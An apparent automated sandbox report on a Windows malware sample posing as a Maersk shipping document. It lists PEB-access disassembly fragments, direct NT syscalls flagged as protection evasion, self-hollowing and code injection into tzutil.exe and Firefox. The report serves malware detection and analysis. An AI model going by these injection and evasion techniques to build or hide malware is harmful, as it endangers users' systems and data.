                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01826420 mov eax, dword ptr fs:[00000030h]3_2_01826420
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D44B0 mov ecx, dword ptr fs:[00000030h]3_2_017D44B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A64AB mov eax, dword ptr fs:[00000030h]3_2_017A64AB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0185A456 mov eax, dword ptr fs:[00000030h]3_2_0185A456
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C460 mov ecx, dword ptr fs:[00000030h]3_2_0182C460
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8770 mov eax, dword ptr fs:[00000030h]3_2_017A8770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184678E mov eax, dword ptr fs:[00000030h]3_2_0184678E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0770 mov eax, dword ptr fs:[00000030h]3_2_017B0770
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018547A0 mov eax, dword ptr fs:[00000030h]3_2_018547A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0750 mov eax, dword ptr fs:[00000030h]3_2_017A0750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2750 mov eax, dword ptr fs:[00000030h]3_2_017E2750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2750 mov eax, dword ptr fs:[00000030h]3_2_017E2750
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov esi, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov eax, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D674D mov eax, dword ptr fs:[00000030h]3_2_017D674D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov eax, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov ecx, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D273C mov eax, dword ptr fs:[00000030h]3_2_017D273C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018207C3 mov eax, dword ptr fs:[00000030h]3_2_018207C3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC720 mov eax, dword ptr fs:[00000030h]3_2_017DC720
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC720 mov eax, dword ptr fs:[00000030h]3_2_017DC720
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E7E1 mov eax, dword ptr fs:[00000030h]3_2_0182E7E1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0710 mov eax, dword ptr fs:[00000030h]3_2_017A0710
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D0710 mov eax, dword ptr fs:[00000030h]3_2_017D0710
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC700 mov eax, dword ptr fs:[00000030h]3_2_017DC700
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A47FB mov eax, dword ptr fs:[00000030h]3_2_017A47FB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A47FB mov eax, dword ptr fs:[00000030h]3_2_017A47FB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C27ED mov eax, dword ptr fs:[00000030h]3_2_017C27ED
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181C730 mov eax, dword ptr fs:[00000030h]3_2_0181C730
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AC7C0 mov eax, dword ptr fs:[00000030h]3_2_017AC7C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A07AF mov eax, dword ptr fs:[00000030h]3_2_017A07AF
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01824755 mov eax, dword ptr fs:[00000030h]3_2_01824755
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E75D mov eax, dword ptr fs:[00000030h]3_2_0182E75D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D2674 mov eax, dword ptr fs:[00000030h]3_2_017D2674
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA660 mov eax, dword ptr fs:[00000030h]3_2_017DA660
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA660 mov eax, dword ptr fs:[00000030h]3_2_017DA660
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BC640 mov eax, dword ptr fs:[00000030h]3_2_017BC640
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A262C mov eax, dword ptr fs:[00000030h]3_2_017A262C
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017BE627 mov eax, dword ptr fs:[00000030h]3_2_017BE627
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D6620 mov eax, dword ptr fs:[00000030h]3_2_017D6620
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8620 mov eax, dword ptr fs:[00000030h]3_2_017D8620
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E2619 mov eax, dword ptr fs:[00000030h]3_2_017E2619
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E6F2 mov eax, dword ptr fs:[00000030h]3_2_0181E6F2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018206F1 mov eax, dword ptr fs:[00000030h]3_2_018206F1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018206F1 mov eax, dword ptr fs:[00000030h]3_2_018206F1
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E609 mov eax, dword ptr fs:[00000030h]3_2_0181E609
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017DA6C7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DA6C7 mov eax, dword ptr fs:[00000030h]3_2_017DA6C7
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D66B0 mov eax, dword ptr fs:[00000030h]3_2_017D66B0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DC6A6 mov eax, dword ptr fs:[00000030h]3_2_017DC6A6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186866E mov eax, dword ptr fs:[00000030h]3_2_0186866E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186866E mov eax, dword ptr fs:[00000030h]3_2_0186866E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4690 mov eax, dword ptr fs:[00000030h]3_2_017A4690
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A4690 mov eax, dword ptr fs:[00000030h]3_2_017A4690
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov eax, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov edx, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017E096E mov eax, dword ptr fs:[00000030h]3_2_017E096E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C6962 mov eax, dword ptr fs:[00000030h]3_2_017C6962
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov esi, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov eax, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018289B3 mov eax, dword ptr fs:[00000030h]3_2_018289B3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_018369C0 mov eax, dword ptr fs:[00000030h]3_2_018369C0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186A9D3 mov eax, dword ptr fs:[00000030h]3_2_0186A9D3
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01798918 mov eax, dword ptr fs:[00000030h]3_2_01798918
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01798918 mov eax, dword ptr fs:[00000030h]3_2_01798918
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182E9E0 mov eax, dword ptr fs:[00000030h]3_2_0182E9E0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D29F9 mov eax, dword ptr fs:[00000030h]3_2_017D29F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D29F9 mov eax, dword ptr fs:[00000030h]3_2_017D29F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E908 mov eax, dword ptr fs:[00000030h]3_2_0181E908
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181E908 mov eax, dword ptr fs:[00000030h]3_2_0181E908
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182C912 mov eax, dword ptr fs:[00000030h]3_2_0182C912
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182892A mov eax, dword ptr fs:[00000030h]3_2_0182892A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0183892B mov eax, dword ptr fs:[00000030h]3_2_0183892B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AA9D0 mov eax, dword ptr fs:[00000030h]3_2_017AA9D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D49D0 mov eax, dword ptr fs:[00000030h]3_2_017D49D0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01820946 mov eax, dword ptr fs:[00000030h]3_2_01820946
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874940 mov eax, dword ptr fs:[00000030h]3_2_01874940
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD mov eax, dword ptr fs:[00000030h]3_2_017A09AD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD mov eax, dword ptr fs:[00000030h]3_2_017A09AD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B29A0 mov eax, dword ptr fs:[00000030h]3_2_017B29A0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQuerySystemInformation: Direct from: 0x76F148CC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtAllocateVirtualMemory: Direct from: 0x76F148EC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQueryAttributesFile: Direct from: 0x76F12E6C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtReadVirtualMemory: Direct from: 0x76F12E8C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtCreateKey: Direct from: 0x76F12C6C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtSetInformationThread: Direct from: 0x76F12B4C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtAllocateVirtualMemory: Direct from: 0x76F13C9C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtWriteVirtualMemory: Direct from: 0x76F1490C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtCreateUserProcess: Direct from: 0x76F1371C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtTerminateThread: Direct from: 0x76F12FCC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtCreateFile: Direct from: 0x76F12FEC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtOpenFile: Direct from: 0x76F12DCC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQueryInformationToken: Direct from: 0x76F12CAC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BEC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtDeviceIoControlFile: Direct from: 0x76F12AEC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtSetInformationThread: Direct from: 0x76F063F9
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtOpenSection: Direct from: 0x76F12E0C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtMapViewOfSection: Direct from: 0x76F12D1C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtResumeThread: Direct from: 0x76F136AC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtCreateMutant: Direct from: 0x76F135CC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtWriteVirtualMemory: Direct from: 0x76F12E3C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtNotifyChangeKey: Direct from: 0x76F13C2C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtProtectVirtualMemory: Direct from: 0x76F07B2E
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtProtectVirtualMemory: Direct from: 0x76F12F9C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtSetInformationProcess: Direct from: 0x76F12C5C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtOpenKeyEx: Direct from: 0x76F12B9C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQueryInformationProcess: Direct from: 0x76F12C26
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtResumeThread: Direct from: 0x76F12FBC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtDelayExecution: Direct from: 0x76F12DDC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtReadFile: Direct from: 0x76F12ADC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtQuerySystemInformation: Direct from: 0x76F12DFC
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BFC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Memory written: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Section loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\tzutil.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread register set: target process: 2652
                Source: C:\Windows\SysWOW64\tzutil.exe; Thread APC queued: target process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Process created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe; Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
